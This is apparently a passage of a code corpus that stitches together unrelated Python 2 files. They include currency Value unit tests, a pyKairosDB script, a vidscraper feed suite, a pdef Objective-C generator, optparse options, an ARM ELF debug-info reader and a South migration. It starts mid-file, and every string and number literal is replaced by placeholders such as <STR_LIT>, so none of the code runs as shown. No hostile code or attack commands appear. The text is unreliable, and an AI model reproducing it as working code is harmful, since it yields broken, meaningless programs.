"<STR_LIT>" : amount } ) <EOL> self . assertEqual ( Value ( { "<STR_LIT>" : - amount } ) , - value ) <EOL> def testNegative ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertFalse ( value . negative ( ) ) <EOL> self . assertTrue ( ( - value ) . negative ( ) ) <EOL> def testEquality ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> value2 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> value3 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . 
assertTrue ( value == value2 ) <EOL> self . assertFalse ( value == value3 ) <EOL> self . assertFalse ( value == None ) <EOL> def testMultiplication ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> value2 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertEqual ( value2 , value * Decimal ( <NUM_LIT:2> ) ) <EOL> self . assertEqual ( value2 , value * Decimal ( "<STR_LIT>" ) ) <EOL> def testFormat ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( value ) ) <EOL> self . assertEqual ( "<STR_LIT:0>" , str ( ZERO ) ) <EOL> def testComparison ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> value2 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertGreater ( value , value2 ) <EOL> self . assertLess ( value2 , value ) <EOL> self . assertGreaterEqual ( value , value2 ) <EOL> self . assertGreaterEqual ( value , value ) <EOL> self . assertLessEqual ( value2 , value ) <EOL> self . assertLessEqual ( value2 , value2 ) <EOL> def testParsePositive ( self ) : <EOL> value = Value . parse ( "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:2> , value . precision ) <EOL> def testParseNegative ( self ) : <EOL> value = Value . parse ( "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:2> , value . precision ) <EOL> def testParsePrecision ( self ) : <EOL> value = Value . parse ( "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:4> , value . precision ) <EOL> class MultipleCurrencies ( unittest . TestCase ) : <EOL> def testComponents ( self ) : <EOL> value1 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> value2 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertItemsEqual ( [ value1 , value2 ] , value . 
components ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import time <EOL> import pyKairosDB <EOL> from pyKairosDB import util as util <EOL> from pyKairosDB import graphite <EOL> c = pyKairosDB . connect ( ) <EOL> start_time = time . time ( ) - <NUM_LIT> <EOL> end_time = time . time ( ) <EOL> metrics_list = graphite . expand_graphite_wildcard_metric_name ( c , "<STR_LIT>" ) <EOL> ( timeinfo , datapoints ) = graphite . read_absolute ( c , metrics_list [ <NUM_LIT:0> ] , start_time , end_time ) <EOL> print "<STR_LIT>" <EOL> print datapoints <EOL> print "<STR_LIT>" <EOL> print timeinfo </s>
# Vidscraper suite: recognizes one site's feed URLs and converts feed items
# into vidscraper video data.  (Python 2: `urlparse` module.)
import urlparse

import feedparser

from vidscraper.exceptions import UnhandledFeed
from vidscraper.suites import BaseSuite, registry
from vidscraper.utils.feedparser import (get_accepted_enclosures,
                                         struct_time_to_datetime)
from vidscraper.videos import FeedparserFeed, VideoFile

# Register an extra XML namespace with feedparser so elements in that
# namespace are exposed on parsed entries.
feedparser._FeedParserMixin.namespaces[
    '<STR_LIT>'] = '<STR_LIT>'


class Feed(FeedparserFeed):
    """Feed handler for one site's feed endpoint.

    A URL is claimed by this suite only when its scheme, host and path all
    match the class attributes below; the identifying fields are then taken
    from the query string.
    """
    schemes = ('<STR_LIT:http>', '<STR_LIT>')
    netlocs = ('<STR_LIT>', '<STR_LIT>')
    path = '<STR_LIT>'
    page_url_format = ('<STR_LIT>'
                       '<STR_LIT>'
                       '<STR_LIT>')

    def _next_page(self):
        # Single-page feed: stop iteration once we are past the first page
        # or have already produced any items.
        if self.start_index != <NUM_LIT:1> or self.item_count > <NUM_LIT:0>:
            raise StopIteration
        super(Feed, self)._next_page()

    def get_url_data(self, url):
        """Extract this suite's identifying fields from *url*.

        Raises UnhandledFeed when the URL does not belong to this suite or
        a required query parameter is missing/empty.
        """
        parsed_url = urlparse.urlsplit(url)
        if (parsed_url.scheme in self.schemes and
                parsed_url.netloc in self.netlocs and
                parsed_url.path == self.path):
            parsed_qs = urlparse.parse_qs(parsed_url.query)
            try:
                return {
                    '<STR_LIT>': parsed_qs['<STR_LIT>'][<NUM_LIT:0>],
                    '<STR_LIT>': parsed_qs['<STR_LIT>'][<NUM_LIT:0>],
                    '<STR_LIT>': parsed_qs['<STR_LIT>'][<NUM_LIT:0>],
                }
            except (KeyError, IndexError):
                # Missing or empty query parameter: fall through to the
                # UnhandledFeed below.
                pass
        raise UnhandledFeed(url)

    def get_video_data(self, item):
        """Build the video-data dict for one feedparser entry.

        One VideoFile per accepted enclosure; the length falls back between
        two enclosure attributes.  NOTE(review): item.media_thumbnail[0] and
        item.published_parsed will raise if the entry lacks those fields —
        presumably guaranteed by this site's feeds; confirm.
        """
        files = [VideoFile(url=enclosure.get('<STR_LIT:url>'),
                           mime_type=enclosure.get('<STR_LIT:type>'),
                           length=(enclosure.get('<STR_LIT>') or
                                   enclosure.get('<STR_LIT>')))
                 for enclosure in get_accepted_enclosures(item)]
        data = {
            '<STR_LIT:title>': item.title,
            '<STR_LIT:description>': item.description,
            '<STR_LIT>': item.media_thumbnail[<NUM_LIT:0>]['<STR_LIT:url>'],
            '<STR_LIT>': struct_time_to_datetime(item.published_parsed),
            '<STR_LIT:user>': item['<STR_LIT>'],
            '<STR_LIT>': files or None,  # empty list is normalized to None
        }
        return data


class Suite(BaseSuite):
    # Suite whose only specialization is the Feed class above.
    feed_class = Feed


registry.register(Suite)
# pdef compiler back end: renders Objective-C header/implementation files for
# every type in a package, using the Jinja-style templates in this package.
from __future__ import unicode_literals
from pdefc import lang, __version__
from pdefc.templates import Templates, write_file, upper_first, lower_first

IMPL_TEMPLATE = '<STR_LIT>'
HEADER_TEMPLATE = '<STR_LIT>'
STRUCT_SUFFIX = '<STR_LIT>'
INTERFACE_SUFFIX = '<STR_LIT>'
GENERATED_BY = '<STR_LIT>' % __version__


def generate(package, dst, prefix=None):
    """Module-level convenience wrapper around Generator.generate()."""
    generator = Generator(prefix)
    return generator.generate(package, dst)


class Generator(object):
    """Renders one .h and one .m file per type, with an optional class-name
    prefix applied to every generated Objective-C name."""

    def __init__(self, prefix=None):
        self.prefix = prefix or '<STR_LIT>'
        # The generator itself is the filter namespace: template filters
        # resolve to the objc_* methods below.
        self.templates = Templates(__file__, filters=self)

    def generate(self, package, dst):
        """Render header and implementation files for every type of every
        file in *package* into the *dst* directory."""
        # NOTE(review): `file` shadows the builtin; harmless here but kept
        # unchanged in this documentation-only pass.
        for file in package.files:
            for type0 in file.types:
                name = self.objc_name(type0)
                template_h, template_m = self._template_names(type0)
                self._generate(type0, dst, '<STR_LIT>' % name, template_h)
                self._generate(type0, dst, '<STR_LIT>' % name, template_m)

    def _generate(self, type0, dst, filename, tmpl):
        # Render a single template for type0 and write it under dst.
        name = self.objc_name(type0)
        code = self.templates.render(tmpl, definition=type0, name=name, generated_by=GENERATED_BY)
        write_file(dst, filename, code)

    def _template_names(self, type0):
        # Map a type kind to its (header, implementation) template pair.
        # NOTE(review): implicitly returns None for any other kind, which
        # would break tuple unpacking in generate() — confirm all kinds are
        # covered upstream.
        if type0.is_struct:
            return '<STR_LIT>', '<STR_LIT>'
        elif type0.is_interface:
            return '<STR_LIT>', '<STR_LIT>'
        elif type0.is_enum:
            return '<STR_LIT>', '<STR_LIT>'

    def objc_name(self, type0):
        """Return the prefixed Objective-C name for *type0*, appending the
        struct/interface suffix unless the name already ends with it
        (case-insensitively)."""
        name = self.prefix + type0.name
        if type0.is_struct and not type0.is_exception:
            suffix = STRUCT_SUFFIX
        elif type0.is_interface:
            suffix = INTERFACE_SUFFIX
        else:
            suffix = None
        if not suffix or name.lower().endswith(suffix.lower()):
            return name
        return name + suffix

    def objc_type(self, type0):
        """Return the Objective-C type literal for *type0* (template filter)."""
        # Primitive types come straight from the lookup table.
        if type0 in _TYPES:
            return _TYPES[type0]
        if type0.is_list:
            return '<STR_LIT>'
        elif type0.is_set:
            return '<STR_LIT>'
        elif type0.is_map:
            return '<STR_LIT>'
        elif type0.is_enum:
            return '<STR_LIT>' % self.objc_name(type0)
        # Anything else is a user-defined (struct/interface) type.
        return '<STR_LIT>' % (self.objc_name(type0))

    def objc_reflex(self, type0):
        """Return the reflection/descriptor expression for *type0*, recursing
        into element/key/value types for containers (template filter)."""
        if type0 in _REFLEX_TYPES:
            return _REFLEX_TYPES[type0]
        if type0.is_list:
            return '<STR_LIT>' % self.objc_reflex(type0.element)
        elif type0.is_set:
            return '<STR_LIT>' % self.objc_reflex(type0.element)
        elif type0.is_map:
            key = self.objc_reflex(type0.key)
            value = self.objc_reflex(type0.value)
            return '<STR_LIT>' % (key, value)
        elif type0.is_enum:
            return '<STR_LIT>' % self.objc_name(type0)
        return '<STR_LIT>' % self.objc_name(type0)

    def objc_signature(self, method):
        """Build the multi-line Objective-C method signature for *method*,
        aligning subsequent argument labels on the first colon (template
        filter)."""
        s = []
        if method.is_last:
            s.append('<STR_LIT>')
        else:
            s.append('<STR_LIT>' % self.objc_type(method.result))
        s.append(method.name)
        is_first = True
        colon_index = <NUM_LIT:0>
        for arg in method.args:
            if is_first:
                s.append('<STR_LIT>')
                s.append(upper_first(arg.name))
                s.append('<STR_LIT::>')
                # Remember where the first colon lands so later labels can
                # be right-aligned to it.
                colon_index = '<STR_LIT>'.join(s).index('<STR_LIT::>')
                is_first = False
            else:
                s.append('<STR_LIT:\n>')
                # Pad so this argument's colon lines up with the first one.
                spaces = max(colon_index - len(arg.name), <NUM_LIT:0>)
                s.append('<STR_LIT:U+0020>' * spaces)
                s.append(arg.name)
                s.append('<STR_LIT::>')
            s.append('<STR_LIT>' % self.objc_type(arg.type).strip())
            s.append(arg.name)
        return '<STR_LIT>'.join(s)

    def objc_selector(self, method):
        """Build the Objective-C selector string for *method*: the first
        argument's label is folded into the method name, every argument adds
        a trailing colon (template filter)."""
        s = [method.name]
        is_first = True
        for arg in method.args:
            if is_first:
                s.append('<STR_LIT>')
                s.append(upper_first(arg.name))
                is_first = False
            else:
                s.append(arg.name)
            s.append('<STR_LIT::>')
        return '<STR_LIT>'.join(s)

    def objc_method_options(self, method):
        """Return the joined option flags for *method*: GET vs POST, plus a
        request flag when applicable (template filter)."""
        s = []
        if method.is_get:
            s.append('<STR_LIT>')
        elif method.is_post:
            s.append('<STR_LIT>')
        if method.is_request:
            s.append('<STR_LIT>')
        return '<STR_LIT>'.join(s)


# Primitive pdef type -> Objective-C type literal.
_TYPES = {
    lang.BOOL: '<STR_LIT>',
    lang.INT16: '<STR_LIT>',
    lang.INT32: '<STR_LIT>',
    lang.INT64: '<STR_LIT>',
    lang.FLOAT: '<STR_LIT>',
    lang.DOUBLE: '<STR_LIT>',
    lang.STRING: '<STR_LIT>',
    lang.DATETIME: '<STR_LIT>',
    lang.VOID: '<STR_LIT>',
}

# Primitive pdef type -> reflection/descriptor expression.
_REFLEX_TYPES = {
    lang.BOOL: '<STR_LIT>',
    lang.INT16: '<STR_LIT>',
    lang.INT32: '<STR_LIT>',
    lang.INT64: '<STR_LIT>',
    lang.FLOAT: '<STR_LIT>',
    lang.DOUBLE: '<STR_LIT>',
    lang.STRING: '<STR_LIT>',
    lang.DATETIME: '<STR_LIT>',
    lang.VOID: '<STR_LIT>',
}
# Command-line option definitions shared by the tool's subcommands, with a
# custom help formatter that appends defaults/choices to each option's help.
__all__ = ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>']

import os
from optparse import OptionGroup, NO_DEFAULT
from optparse import TitledHelpFormatter

# wx is optional: when present, file options use a richer 'file' option type.
try:
    import wx
    have_wx = True
except ImportError:
    have_wx = False


class MyHelpFormatter(TitledHelpFormatter):
    """Help formatter that annotates each option's help text with its
    choices (marking the default with brackets) or its default value."""

    def format_option(self, option):
        # option.help is temporarily rewritten for formatting and restored
        # afterwards, so the option object is left unmodified.
        old_help = option.help
        default = option.default
        if isinstance(default, str) and '<STR_LIT:U+0020>' in default:
            # Quote defaults containing spaces so they read unambiguously.
            default = repr(default)
        if option.help is None:
            option.help = '<STR_LIT>' % (option.type)
        if option.type == '<STR_LIT>':
            # Choice options: list every choice, bracketing the default.
            choices = []
            for choice in option.choices:
                if choice == option.default:
                    if '<STR_LIT:U+0020>' in choice:
                        choice = repr(choice)
                    choice = '<STR_LIT:[>' + choice + '<STR_LIT:]>'
                else:
                    if '<STR_LIT:U+0020>' in choice:
                        choice = repr(choice)
                choices.append(choice)
            option.help = '<STR_LIT>' % (option.help, '<STR_LIT:U+002CU+0020>'.join(choices))
        else:
            if default != NO_DEFAULT:
                if option.action == '<STR_LIT>':
                    # For toggle actions, show what the flag switches TO.
                    option.help = '<STR_LIT>' % (option.help, not default)
                else:
                    option.help = '<STR_LIT>' % (option.help, default)
        result = TitledHelpFormatter.format_option(self, option)
        option.help = old_help
        return result


# Single shared formatter instance used by every parser below.
help_formatter = MyHelpFormatter()


def set_formatter(parser):
    """Install the shared default-annotating help formatter on *parser*."""
    parser.formatter = help_formatter


def set_convert_options(parser):
    """Configure *parser* with the options of the 'convert' subcommand."""
    set_formatter(parser)
    if os.name == '<STR_LIT>':
        # On this platform, switch matplotlib's backend and the parser's
        # run method when matplotlib is available; otherwise run as-is.
        try:
            import matplotlib
            matplotlib.use('<STR_LIT>')
            parser.run_methods = ['<STR_LIT>']
        except ImportError:
            pass
    parser.set_usage('<STR_LIT>')
    parser.set_description('<STR_LIT>')
    # NOTE(review): without wx the option type falls back to the `str`
    # builtin rather than a type-name string — confirm the parser accepts
    # that form.
    parser.add_option('<STR_LIT>', '<STR_LIT>',
                      type='<STR_LIT:file>' if have_wx else str, metavar='<STR_LIT>',
                      help='<STR_LIT>'
                      )
    parser.add_option('<STR_LIT>', '<STR_LIT>',
                      type='<STR_LIT:file>' if have_wx else str, metavar='<STR_LIT>',
                      help='<STR_LIT>'
                      )
    parser.add_option('<STR_LIT>',
                      type='<STR_LIT>', default='<STR_LIT:none>',
                      choices=['<STR_LIT:none>', '<STR_LIT>'],
                      help='<STR_LIT>'
                      )
    parser.add_option('<STR_LIT>',
                      type='<STR_LIT:string>',
                      help='<STR_LIT>'
                      )


def set_info_options(parser):
    """Configure *parser* with the options of the 'info' subcommand."""
    set_formatter(parser)
    if os.name == '<STR_LIT>':
        # Same optional matplotlib backend switch as set_convert_options.
        try:
            import matplotlib
            matplotlib.use('<STR_LIT>')
            parser.run_methods = ['<STR_LIT>']
        except ImportError:
            pass
    parser.set_usage('<STR_LIT>')
    parser.set_description('<STR_LIT>')
    parser.add_option('<STR_LIT>', '<STR_LIT>',
                      type='<STR_LIT:file>' if have_wx else str, metavar='<STR_LIT>',
                      help='<STR_LIT>'
                      )
    parser.add_option('<STR_LIT>',
                      action='<STR_LIT:store_true>', default=False,
                      help='<STR_LIT>'
                      )
    parser.add_option('<STR_LIT>', dest='<STR_LIT>',
                      action='<STR_LIT>',
                      help='<STR_LIT>'
                      )
    parser.add_option('<STR_LIT>',
                      action='<STR_LIT:store_true>', default=False,
                      help='<STR_LIT>'
                      )
    parser.add_option('<STR_LIT>', dest='<STR_LIT>',
                      action='<STR_LIT>', help='<STR_LIT>')
    parser.add_option('<STR_LIT>',
                      action='<STR_LIT:store_true>', default=False,
                      help='<STR_LIT>'
                      )
    parser.add_option('<STR_LIT>', dest='<STR_LIT>',
                      action='<STR_LIT>', help='<STR_LIT>')
<s> import subprocess <EOL> import re <EOL> from . import ARM_CS_TOOLS <EOL> class LineReader ( object ) : <EOL> def __init__ ( self , elf_path ) : <EOL> self . elf = elf_path <EOL> def _exec_tool ( self ) : <EOL> return subprocess . check_output ( [ ARM_CS_TOOLS + "<STR_LIT>" , "<STR_LIT>" , self . elf ] ) <EOL> def get_line_listing ( self ) : <EOL> decoded = self . _exec_tool ( ) <EOL> lines = [ <EOL> { '<STR_LIT:file>' : x . group ( <NUM_LIT:1> ) , '<STR_LIT>' : int ( x . group ( <NUM_LIT:2> ) ) , '<STR_LIT:address>' : int ( x . group ( <NUM_LIT:3> ) , <NUM_LIT:16> ) } <EOL> for x in re . finditer ( r"<STR_LIT>" , decoded , re . MULTILINE ) <EOL> ] <EOL> files = [ x . group ( <NUM_LIT:1> ) for x in re . finditer ( r"<STR_LIT>" , decoded , re . MULTILINE ) ] <EOL> return files , lines <EOL> def get_compact_listing ( self ) : <EOL> files , lines = self . get_line_listing ( ) <EOL> file_id_lookup = { files [ x ] : x for x in xrange ( len ( files ) ) } <EOL> compact_lines = [ ( x [ '<STR_LIT:address>' ] , file_id_lookup [ x [ '<STR_LIT:file>' ] ] , x [ '<STR_LIT>' ] ) for x in lines ] <EOL> compact_lines . sort ( key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> return { '<STR_LIT>' : files , '<STR_LIT>' : compact_lines } <EOL> class FunctionRange ( object ) : <EOL> def __init__ ( self , name , start , end , line = None ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . start = start <EOL> self . end = end <EOL> self . line = line <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . start , self . end , self . line ) <EOL> class FunctionReader ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , elf_path ) : <EOL> self . elf = elf_path <EOL> def _exec_tool ( self ) : <EOL> return subprocess . check_output ( [ ARM_CS_TOOLS + "<STR_LIT>" , "<STR_LIT>" , self . elf ] ) <EOL> def _decode_info_fields ( self , content ) : <EOL> """<STR_LIT>""" <EOL> lines = content . 
split ( "<STR_LIT:\n>" ) <EOL> keys = { } <EOL> for line in lines : <EOL> line_parts = re . split ( r"<STR_LIT>" , line . strip ( ) , <NUM_LIT:3> ) <EOL> if len ( line_parts ) < <NUM_LIT:4> : <EOL> continue <EOL> keys [ line_parts [ <NUM_LIT:1> ] ] = line_parts [ <NUM_LIT:3> ] <EOL> return keys <EOL> def iter_info_groups ( self ) : <EOL> content = self . _exec_tool ( ) <EOL> for match in re . finditer ( r"<STR_LIT>" , content , re . DOTALL ) : <EOL> fields = self . _decode_info_fields ( match . group ( <NUM_LIT:1> ) ) <EOL> if '<STR_LIT>' not in fields or '<STR_LIT>' not in fields or '<STR_LIT>' not in fields : <EOL> continue <EOL> fn_name = fields [ '<STR_LIT>' ] . split ( '<STR_LIT:U+0020>' ) [ - <NUM_LIT:1> ] <EOL> fn_start = int ( fields [ '<STR_LIT>' ] , <NUM_LIT:16> ) <EOL> fn_end = int ( fields [ '<STR_LIT>' ] , <NUM_LIT:16> ) <EOL> fn_line = int ( fields [ '<STR_LIT>' ] ) if '<STR_LIT>' in fields else None <EOL> yield FunctionRange ( fn_name , fn_start , fn_end , fn_line ) <EOL> def get_info_groups ( self ) : <EOL> return list ( self . iter_info_groups ( ) ) <EOL> def create_coalesced_group ( elf ) : <EOL> dict = LineReader ( elf ) . get_compact_listing ( ) <EOL> dict [ '<STR_LIT>' ] = sorted ( [ ( x . start , x . end , x . name , x . line ) for x in FunctionReader ( elf ) . iter_info_groups ( ) ] , key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> return dict </s>
# Auto-generated South schema migration.
# forwards(): adds three nullable columns via db.add_column(...,
# null=True, blank=True, keep_default=False); backwards(): drops the same
# three columns.  The `models` attribute is South's frozen-ORM snapshot of
# the app's models at migration time — data for South's migration machinery,
# not executable model definitions; do not edit it by hand.
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) , <EOL> keep_default = False ) <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) , <EOL> keep_default = False ) <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] 
, { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { 
<EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> 
